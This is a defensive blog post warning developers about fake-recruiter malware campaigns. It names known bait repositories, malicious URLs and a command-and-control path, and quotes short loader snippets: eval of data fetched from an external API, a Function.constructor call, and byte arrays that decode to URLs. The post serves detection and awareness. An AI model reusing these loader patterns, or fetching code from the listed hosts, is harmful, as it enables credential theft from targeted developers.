Watch out - that recruiter profile might be a scam. Check here first.
This is part 3 of the recruiter scam series.
Read these first:
- Watch out, your recruiter might be a scam
- How to safely inspect a repository before running anything on your machine
Now the shorter warning:
Before you reply to a suspicious recruiter, check the community list.
github.com/xndbogdan/malicious-repositories
That repository collects malicious projects, payload delivery APIs, scammer LinkedIn profiles, and real examples from developers who were targeted. It exists because people kept receiving fake technical interviews that were actually malware delivery attempts.
Use it.
If a recruiter sends you a repository, a Calendly link, a Google Doc full of roles, or a “quick technical assessment”, check there first.
the list exists for a reason
The repo says the samples were collected from scammers attempting to steal credentials through LinkedIn. It also says the code should not be run or even installed.
That is the correct warning level.
The collection includes bait repositories that look like normal Web3, crypto, rental, real estate, game, staking, or MVP projects:
real_estatereal_estate_newreal_estate_platform_mvp_v1multify_stakingDEX-staking-project-ultraxerc20-token-dappmunity-gameweb3gamegolden-citysarostech-assessmentchallenge-experiment-modulecoinpool-rental-platform1.0real-estate-rental-platform
The pattern is boring because it works: the repo looks like a legitimate take-home assignment, and the developer is pressured to clone it and run it locally.
Do not be the next sample.
the J-Soft Labs case
One documented variant used a fake company called J-Soft Labs.
It had the kind of surface area that makes people lower their guard:
- a LinkedIn company page
- a “Senior Recruiter” profile
- a hijacked real professional profile renamed into a CTO persona
- a Calendly scheduling flow
- a Google Doc with multiple job roles
- a repository framed as a normal technical assessment
That is not a lone scammer improvising in your DMs.
That is an operation.
The community write-up also notes a command-and-control path containing /api/ipcheck-encrypted/603_1, which suggests the pipeline was already broad when it was caught.
That is the part people underestimate. These campaigns are not only trying one candidate at a time. They are running a funnel.
known repos and APIs to check
The community list names several known scam repositories and delivery points. If any of these appear in your interview process, stop:
https://api.npoint.io/https://bitbucket.org/coinpool/rental-platform1.0/https://github.com/MetaBuilderGroup76/challenge-experiment-modulehttps://github.com/SuperDev313/Trading_Platform_Ultraxhttps://github.com/Peiko-Tech-Org/Peiko-Platform-MVP/
The point is not that these are the only bad links.
The point is that the shape is recognizable: disposable repos, external payload APIs, crypto or Web3 framing, and just enough polish to make a rushed developer continue.
the technical fingerprint
You do not need to reverse engineer malware to spot the smell.
Look for these patterns.
1. eval fed by an external API
1
2
const result = await axios.get("https://api.npoint.io/ac2916e3f543effa2edd");
eval(result.data.cookie);
This means the code you reviewed is not the code that runs. The payload arrives later.
2. Function.constructor instead of obvious eval
1
2
const handler = new Function.constructor("require", errCode);
handler(require);
This is still dynamic code execution. It is just trying to dodge simple searches.
3. base64 C2 URLs in example config
If .env.example contains encoded URLs, treat that as hostile until proven otherwise.
.env.example looks harmless because developers assume it is documentation. In these scams, it can become configuration for the loader immediately after clone or setup.
4. byte arrays that decode into URLs
1
2
const byteArray = [104, 116, 116, 112, 115, 58, 47, 47];
const endpoint = String.fromCharCode(...byteArray);
That decodes to the beginning of https://.
If a take-home assignment hides a URL like this, you already have your answer.
5. Vercel-hosted second stages
Many payloads use disposable *.vercel.app infrastructure.
The domain might be gone by the time you inspect it. That does not make the repo safe. It means the attacker can replace infrastructure faster than you can bookmark indicators.
6. one commit: “Initial Version”
Most real projects have history.
Many scam repos do not. A single commit named Initial Version, especially around crypto/Web3 projects from unknown accounts, should raise your guard.
what to do before engaging
Use this flow before you reply, schedule, or clone.
- Search the recruiter profile URL in the community repo.
- Search the company name in the community repo.
- Search the repository URL in the known scam list.
- Check whether the company exists outside LinkedIn.
- Check whether the recruiter has real history, posts, mutual connections, and consistent employment.
- Scan the repo at scanrepo.dev before touching it locally.
- If you find a new scam profile or repo, open an issue or PR in xndbogdan/malicious-repositories.
That last step matters.
The list only works because targeted developers report what they see. Two minutes of reporting can save the next person from running the payload.
LinkedIn red flags
Compensation red flags:
- pay is unusually high for the role
- the role details are vague
- banking or personal information appears early
Profile red flags:
- recently created profile
- no posts or engagement
- no mutual connections
- no recommendations
- title does not match history
- company has no real web presence outside LinkedIn
Process red flags:
- interview process moves too fast
- pressure to act immediately
- recruiter wants to move off LinkedIn quickly
- technical test is “clone this repo and run it locally”
- they resist sandboxing, Codespaces, or a safer environment
A real recruiter can survive basic verification.
A fake one usually gets impatient.
the simple rule
Do not treat recruiter profiles as identity.
Treat them as claims.
Check the claims.
Check the company.
Check the repo.
Check the community list:
github.com/xndbogdan/malicious-repositories
Then scan the repo:
And if you find a new scam, report it back.
This is how the community makes the next attack less effective.